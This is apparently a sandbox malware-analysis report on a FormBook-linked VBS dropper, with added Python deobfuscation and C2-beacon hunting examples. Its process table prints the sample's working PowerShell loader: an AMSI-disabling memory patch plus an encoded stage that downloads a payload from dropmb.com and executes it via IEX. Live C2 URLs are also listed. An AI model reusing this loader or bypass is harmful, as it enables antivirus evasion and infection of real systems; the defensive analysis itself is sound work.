File name: | 0124.doc_Client.vbs |
Full analysis: | https://app.any.run/tasks/43752327-6c32-4206-a4ed-466cb4af4494 |
Verdict: | Malicious activity |
Threats: | FormBook is a data stealer sold as malware-as-a-service (MaaS). It stands out from much competing malware by its ease of use, which lets even inexperienced threat actors deploy it. |
Analysis date: | January 24, 2022, 19:52:28 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators |
MD5: | 5E605629FBD78A3204A3F6F3D1834C3C |
SHA1: | 94487ED76A8B8CF6E4B5E5D2A848F490EDFD0122 |
SHA256: | DD35C7E4A25DB4559824CB76CFEB4310C796348DF2489C1FFFB698D3A8159B9F |
SSDEEP: | 192:CN0/2qhwbNME0z1yR9q2Jh9tp3F5l9tWwo:CKvKpME0zwo2Jh9tpV5l9tE |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1456 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\0124.doc_Client.vbs" | C:\Windows\System32\WScript.exe | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3584 | Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$394522766385394522766385394522766385394522766385=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,100,114,111,112,109,98,46,99,111,109,47,102,105,108,101,115,47,48,52,51,48,53,99,52,57,97,51,97,48,51,98,97,52,51,57,52,53,50,50,55,54,54,51,56,53,53,53,48,97,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($394522766385394522766385394522766385394522766385)|I`E`X | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
2432 | "{Path}" | C:\WINDOWS\syswow64\calc.exe | — | Powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Calculator Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2632 | "C:\Windows\System32\svchost.exe" | C:\Windows\System32\svchost.exe | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Host Process for Windows Services Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3732 | /c del "C:\WINDOWS\syswow64\calc.exe" | C:\Windows\System32\cmd.exe | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1096 | C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE | — | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
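The PowerShell command line for PID 3584 above is a two-stage loader, and its parent is wmiprvse.exe rather than WScript.exe, i.e. the VBS created the process through WMI. Stage 1 is readable as-is: it enumerates the loaded types for one whose name ends in `iUtils` (System.Management.Automation.AmsiUtils), picks the static field ending in `Context` (the amsiContext handle), and uses `Marshal::Copy` to write four zero bytes over the AMSI context header, after which AmsiScanBuffer rejects the context and nothing further in the session is scanned; the `-like` wildcards exist precisely so that `AmsiUtils` and `amsiContext` never appear literally. Stage 2 is the decimal array fed to `ASCII.GetString` and piped to `I`E`X`. The decoder below is an added example for this report, not code from the sample or from ANY.RUN; it recovers stage 2, then folds the `[char](arithmetic)` casts and string concatenations that hide `AmsiUtils` and `amsiInitFailed`, and pulls the download URL. The sample command line is constructed from two excerpts of the report's array (the reflection call and the MSXML `.open()` call) spliced together; the variable name `$x` is this example's own.

```python
"""Decode the staged PowerShell seen in the PID 3584 command line (added example)."""
import re

# Constructed sample: two excerpts of the report's byte array, spliced.  SEG_A is the
# GetType(...).GetField(...).SetValue(...) call, SEG_B the .open('GET', <url>) call.
SEG_A = ("91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,"
         "91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,"
         "91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,"
         "91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,"
         "91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59")
SEG_B = ("36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,100,114,111,112,109,98,46,99,111,109,47,102,105,108,101,115,47,"
         "48,52,51,48,53,99,52,57,97,51,97,48,51,98,97,52,51,57,52,53,50,50,55,54,54,51,56,53,53,53,48,97,46,106,112,103,39,44,36,102,97,108,115,101,41,59")
SAMPLE_CMD = (
    "[Int32[]]$buf = @(0);"                      # stage 1 also carries a short @(...) array
    "$x=@(" + SEG_A + "," + SEG_B + ");"          # $x stands in for the long numeric name
    "[System.Text.Encoding]::ASCII.GetString($x)|I`E`X"
)

ARRAY_RE = re.compile(r"@\(\s*([0-9][0-9,\s]*)\)")
NUM = r"(0x[0-9a-f]+|\d+)"
# [char](98-33), [cHaR](9680/88), [CHaR]([BYte]0x69): any casing, optional [byte] cast
CHAR_CAST_RE = re.compile(r"\[char\]\(\s*(?:\[byte\]\s*)?" + NUM +
                          r"\s*(?:([-+*/])\s*" + NUM + r")?\s*\)", re.I)
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
SUBEXPR_RE = re.compile(r"\$\('([^']*)'\)")
URL_RE = re.compile(r"https?://[^'\"\s)]+")
AMSI_TOKENS = ("AmsiUtils", "amsiInitFailed", "amsiContext", "AmsiScanBuffer")


def decode_byte_array(cmd: str) -> str:
    """Stage 1 -> stage 2: take the longest @(n,n,...) array and map each value to a char."""
    arrays = ARRAY_RE.findall(cmd)
    if not arrays:
        raise ValueError("no @(...) byte array in command line")
    longest = max(arrays, key=len)
    return "".join(chr(int(n)) for n in longest.split(",") if n.strip())


def _num(tok: str) -> int:
    return int(tok, 16) if tok.lower().startswith("0x") else int(tok)


def fold_char_casts(ps: str) -> str:
    """Replace every [char](<number or a op b>) cast with the quoted literal it yields."""
    def repl(m):
        a = _num(m.group(1))
        if m.group(2):
            b = _num(m.group(3))
            if m.group(2) == "/":
                if a % b:  # PowerShell would round a fractional result; refuse to guess
                    raise ValueError(f"inexact division {a}/{b}")
                a //= b
            else:
                a = {"+": a + b, "-": a - b, "*": a * b}[m.group(2)]
        return "'" + chr(a) + "'"
    return CHAR_CAST_RE.sub(repl, ps)


def fold_concat(ps: str) -> str:
    """Collapse 'a'+'b' into 'ab' and $('ab') into 'ab' until nothing changes."""
    prev = None
    while prev != ps:
        prev = ps
        ps = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", ps)
        ps = SUBEXPR_RE.sub(lambda m: "'" + m.group(1) + "'", ps)
    return ps


def deobfuscate(cmd: str) -> str:
    return fold_concat(fold_char_casts(decode_byte_array(cmd)))


def extract_urls(ps: str) -> list:
    return URL_RE.findall(ps)


def amsi_tamper_tokens(ps: str) -> list:
    """AMSI-tampering identifiers that become visible once the obfuscation is folded."""
    return [t for t in AMSI_TOKENS if t in ps]


if __name__ == "__main__":
    stage2 = deobfuscate(SAMPLE_CMD)
    print(stage2)
    print(amsi_tamper_tokens(stage2), extract_urls(stage2))
```

On the real command line the same functions yield the full second stage: after `SetValue($null,$true)` it loops on `test-connection google.com` until the host has connectivity, forces TLS 1.2 (`SecurityProtocolType` 3072), fetches `https://dropmb.com/files/04305c49a3a03ba4394522766385550a.jpg` with `Microsoft.XMLHTTP`, base64-decodes the response text and pipes it to IEX. Note that string matching on the raw command line finds none of these tokens; a detection for stage 1 should key on the shape (`GetTypes()` plus `GetFields('NonPublic,Static')` plus `Marshal]::Copy` into a pointer read from a static field), not on the names.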
PID | Process | Operation | Key | Name | Value
---|---|---|---|---|---
3584 | Powershell.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass | 1
3584 | Powershell.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName | 1
3584 | Powershell.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 1
3584 | Powershell.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 0
3584 | Powershell.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable | 0
3584 | Powershell.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | SavedLegacySettings | 460000003B010000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A80164000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3584 | Powershell.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | SavedLegacySettings | 460000003C010000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A80164000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3584 | Powershell.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | CachePrefix | 
3584 | Powershell.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies | CachePrefix | Cookie:
3584 | Powershell.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History | CachePrefix | Visited:
PID | Process | Filename | Type | |
---|---|---|---|---|
3584 | Powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:D3C284009A5790C3AA90D7C5D620CA65 | SHA256:6C12FFF497059706D50431BB47C624FA24A8A7F9B6D52B2AB251FDC588E00E39 | |||
3584 | Powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 | binary | |
MD5:14C55843039B73DE83EA222B1D185392 | SHA256:06870EADA394BC09621A2B30A618819472A6A43A0E495D7CA8B777F2EB8C11EB | |||
3584 | Powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 | der | |
MD5:494A7483CEAF488A79CB45418E88ECCD | SHA256:9A65904F97742B3D8844EFAFCE7D9E9DA7C1B96A8FDE541E718768AE68293D50 | |||
3584 | Powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\fav[1].jpg | text | |
MD5:41A71BB6C1AFCF5EB48553B868B245F4 | SHA256:A0233BAFE96FACD58D2E59B4BD78DAA19CA02F6CF47FD57A6D76AEF9EE8D5EB3 | |||
3584 | Powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | binary | |
MD5:F31D349FBCE35F32076463791FB2C3CD | SHA256:233DB2B33AABD9C0442492E96AA5BD6A87AF308665077E7572CE2058F67BE792 | |||
3584 | Powershell.exe | C:\Users\admin\AppData\Local\Temp\zhwzkyko.42f.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3584 | Powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | compressed | |
MD5:F7DCB24540769805E5BB30D193944DCE | SHA256:6B88C6AC55BBD6FEA0EBE5A760D1AD2CFCE251C59D0151A1400701CB927E36EA | |||
3584 | Powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | dbf | |
MD5:446DD1CF97EABA21CF14D03AEBC79F27 | SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF | |||
3584 | Powershell.exe | C:\Users\admin\AppData\Local\Temp\dkung0f0.gco.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1096 | Explorer.EXE | GET | — | 154.12.45.94:80 | http://www.sdgljx.net/m16a/?bvh=mMovUfeSKI1m/89gXuPa6JyvCdCSfNfWVVr+A356xN8OBipzMNYnPjbs2oCZWrXK01zyhw==&D8mTR=7nHL_rzhffpL | US | — | — | malicious |
1096 | Explorer.EXE | GET | 403 | 34.102.136.180:80 | http://www.streamingpremiumpty.xyz/m16a/?bvh=pCw9MYkzbi0S4g329bVhmy2fAc3lUkPC5VmjmpL0jFvY6bbTaiMhBe+fhJLGpBrDAIShuA==&D8mTR=7nHL_rzhffpL | US | html | 300 b | whitelisted |
3584 | Powershell.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D | US | der | 1.47 Kb | whitelisted |
1096 | Explorer.EXE | GET | 301 | 31.170.166.128:80 | http://www.vizminingcorp.com/m16a/?D8mTR=7nHL_rzhffpL&bvh=770TI2qWQJ5X+JhQFi/0u/C/MezrGlcqaWAlXIhkWp7lYgLuoyL36W6qZOWI69IsLpD4hQ== | US | html | 707 b | malicious |
1096 | Explorer.EXE | GET | 301 | 13.251.214.150:80 | http://www.mbcorp.xyz/m16a/?bvh=RPHc8knBDYTG6qNHDnUKiVm7mHSXdI6I/sA9Bt2M94/RtgkiNbm7RvtuVcl1IUGMl7FDrQ==&D8mTR=7nHL_rzhffpL | SG | html | 163 b | malicious |
1096 | Explorer.EXE | GET | 403 | 34.102.136.180:80 | http://www.babylouwray.biz/m16a/?D8mTR=7nHL_rzhffpL&bvh=q6y+niRX7Hv8VaEQVv65V2MWovDntbcEwNhkYCNvOSnLXGh9afIhbfZMdvsmw0+k9848uw== | US | html | 300 b | whitelisted |
1096 | Explorer.EXE | GET | 404 | 216.18.208.202:80 | http://www.wu6eeijb908c.xyz/m16a/?D8mTR=7nHL_rzhffpL&bvh=L4iTDC7toWqlBdOJ2pcLhl2FA6XWy3E6CTZTIOqACjgm1l2+gXb1pjkNtAB3pOtARspW4A== | US | html | 266 b | malicious |
1096 | Explorer.EXE | GET | 200 | 38.26.173.82:80 | http://www.btwlhsp.com/m16a/?bvh=yKUx4gm0WImkgJFSH2V1B4+DZ1TxKjSB2yxLFtEF9QTKKkkYqzmusXWeeEGS1GRsDX9L5Q==&D8mTR=7nHL_rzhffpL | US | html | 1.61 Kb | malicious |
3584 | Powershell.exe | GET | 200 | 93.184.221.240:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?7667b4644111fbc6 | US | compressed | 4.70 Kb | whitelisted |
1096 | Explorer.EXE | GET | 301 | 52.246.138.23:80 | http://www.ml5568.com/m16a/?D8mTR=7nHL_rzhffpL&bvh=M/i1uFS6dyvRs1fIqEuiBDpdOjbn1fUsK7sqk3UbQuDMsM2bmvn1Og/T7r+uuvqG8bHLFg== | HK | html | 166 b | malicious |
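Every Explorer.EXE request in the table above has the same URI shape: the path `/m16a/`, one long base64-looking parameter `bvh` that changes per host, and one short parameter `D8mTR=7nHL_rzhffpL` that never changes, sent to eight unrelated domains in quick succession. The Suricata rules below this table already name it ("ET TROJAN FormBook CnC Checkin (GET)"); the point of the heuristic here is that the same fan-out is visible from structure alone, which matters because reputation does not catch it (two of the hosts are rated "whitelisted" and several answer 403, 404 or 301, consistent with the documented FormBook practice of padding its C2 list with decoy domains). The code below is an added example for this report, not ANY.RUN code and not a FormBook parser; the request list is copied from the HTTP table (PID, process, URL), and the type-tagging rules and the `min_hosts` threshold are this example's own choices.

```python
"""Hunt heuristic: one process issuing same-shaped GETs to many hosts (added example)."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# (pid, process, url) rows copied from the report's HTTP request table above
REQUESTS = [
    (1096, "Explorer.EXE", "http://www.sdgljx.net/m16a/?bvh=mMovUfeSKI1m/89gXuPa6JyvCdCSfNfWVVr+A356xN8OBipzMNYnPjbs2oCZWrXK01zyhw==&D8mTR=7nHL_rzhffpL"),
    (1096, "Explorer.EXE", "http://www.streamingpremiumpty.xyz/m16a/?bvh=pCw9MYkzbi0S4g329bVhmy2fAc3lUkPC5VmjmpL0jFvY6bbTaiMhBe+fhJLGpBrDAIShuA==&D8mTR=7nHL_rzhffpL"),
    (3584, "Powershell.exe", "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D"),
    (1096, "Explorer.EXE", "http://www.vizminingcorp.com/m16a/?D8mTR=7nHL_rzhffpL&bvh=770TI2qWQJ5X+JhQFi/0u/C/MezrGlcqaWAlXIhkWp7lYgLuoyL36W6qZOWI69IsLpD4hQ=="),
    (1096, "Explorer.EXE", "http://www.mbcorp.xyz/m16a/?bvh=RPHc8knBDYTG6qNHDnUKiVm7mHSXdI6I/sA9Bt2M94/RtgkiNbm7RvtuVcl1IUGMl7FDrQ==&D8mTR=7nHL_rzhffpL"),
    (1096, "Explorer.EXE", "http://www.babylouwray.biz/m16a/?D8mTR=7nHL_rzhffpL&bvh=q6y+niRX7Hv8VaEQVv65V2MWovDntbcEwNhkYCNvOSnLXGh9afIhbfZMdvsmw0+k9848uw=="),
    (1096, "Explorer.EXE", "http://www.wu6eeijb908c.xyz/m16a/?D8mTR=7nHL_rzhffpL&bvh=L4iTDC7toWqlBdOJ2pcLhl2FA6XWy3E6CTZTIOqACjgm1l2+gXb1pjkNtAB3pOtARspW4A=="),
    (1096, "Explorer.EXE", "http://www.btwlhsp.com/m16a/?bvh=yKUx4gm0WImkgJFSH2V1B4+DZ1TxKjSB2yxLFtEF9QTKKkkYqzmusXWeeEGS1GRsDX9L5Q==&D8mTR=7nHL_rzhffpL"),
    (3584, "Powershell.exe", "http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?7667b4644111fbc6"),
    (1096, "Explorer.EXE", "http://www.ml5568.com/m16a/?D8mTR=7nHL_rzhffpL&bvh=M/i1uFS6dyvRs1fIqEuiBDpdOjbn1fUsK7sqk3UbQuDMsM2bmvn1Og/T7r+uuvqG8bHLFg=="),
]


def classify(value: str) -> str:
    """Type tag for a query value: long base64-looking blob, short token, or other."""
    if len(value) >= 32 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return "b64"
    if re.fullmatch(r"[A-Za-z0-9_-]{1,16}", value):
        return "token"
    return "other"


def split_query(query: str) -> dict:
    """Split by hand so '+' and '/' inside base64 values are not form-decoded away."""
    params = {}
    for kv in filter(None, query.split("&")):
        k, _, v = kv.partition("=")
        params[k] = v
    return params


def uri_shape(url: str) -> str:
    """Path plus sorted, type-tagged parameters; parameter order does not matter."""
    parts = urlsplit(url)
    tagged = sorted(f"{k}=<{classify(v)}>" for k, v in split_query(parts.query).items())
    return parts.path + ("?" + "&".join(tagged) if tagged else "")


def beacon_clusters(requests, min_hosts: int = 3) -> list:
    """Group by (pid, process, shape) and report groups that reach >= min_hosts
    distinct hosts, together with any parameter whose value never changes."""
    groups = defaultdict(list)
    for pid, proc, url in requests:
        groups[(pid, proc, uri_shape(url))].append(url)
    findings = []
    for (pid, proc, shape), urls in groups.items():
        hosts = sorted({urlsplit(u).hostname for u in urls})
        if len(hosts) < min_hosts:
            continue
        param_sets = [split_query(urlsplit(u).query) for u in urls]
        constant = {k: v for k, v in param_sets[0].items()
                    if all(p.get(k) == v for p in param_sets)}
        findings.append({"pid": pid, "process": proc, "shape": shape,
                         "hosts": hosts, "constant_params": constant})
    return findings


if __name__ == "__main__":
    for f in beacon_clusters(REQUESTS):
        print(f["pid"], f["process"], f["shape"])
        print("  hosts:", ", ".join(f["hosts"]))
        print("  constant params:", f["constant_params"])
```

Sorting the tagged parameters is what makes the `bvh=...&D8mTR=...` and `D8mTR=...&bvh=...` orderings collide into one shape; the two PowerShell requests (OCSP and the CTL download) each form a single-host group and drop out. The constant parameter reported for the cluster is the kind of value worth pivoting on across other sandbox runs of the same campaign.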
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3584 | Powershell.exe | 93.184.221.240:80 | ctldl.windowsupdate.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
3584 | Powershell.exe | 104.21.235.159:443 | dropmb.com | Cloudflare Inc | US | unknown |
3584 | Powershell.exe | 104.21.235.160:443 | dropmb.com | Cloudflare Inc | US | suspicious |
3584 | Powershell.exe | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
1096 | Explorer.EXE | 154.12.45.94:80 | www.sdgljx.net | Cogent Communications | US | malicious |
— | — | 31.170.166.128:80 | www.vizminingcorp.com | Hostinger International Limited | US | malicious |
1096 | Explorer.EXE | 52.246.138.23:80 | www.ml5568.com | Microsoft Corporation | HK | malicious |
1096 | Explorer.EXE | 34.102.136.180:80 | www.babylouwray.biz | — | US | whitelisted |
1096 | Explorer.EXE | 38.26.173.82:80 | www.btwlhsp.com | Cogent Communications | US | malicious |
1096 | Explorer.EXE | 13.251.214.150:80 | www.mbcorp.xyz | Amazon.com, Inc. | SG | malicious |
Domain | IP | Reputation |
---|---|---|
google.com | — | whitelisted
dropmb.com | — | whitelisted
dns.msftncsi.com | — | shared
ctldl.windowsupdate.com | — | whitelisted
ocsp.digicert.com | — | whitelisted
www.ml5568.com | — | unknown
www.sdgljx.net | — | unknown
www.sanyayulang.xyz | — | unknown
www.laboratoriobiobactpvca.com | — | unknown
www.vizminingcorp.com | — | unknown
PID | Process | Class | Message |
---|---|---|---|
1096 | Explorer.EXE | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
1096 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
1096 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
1096 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
1096 | Explorer.EXE | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
1096 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
1096 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
1096 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
1096 | Explorer.EXE | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
1096 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |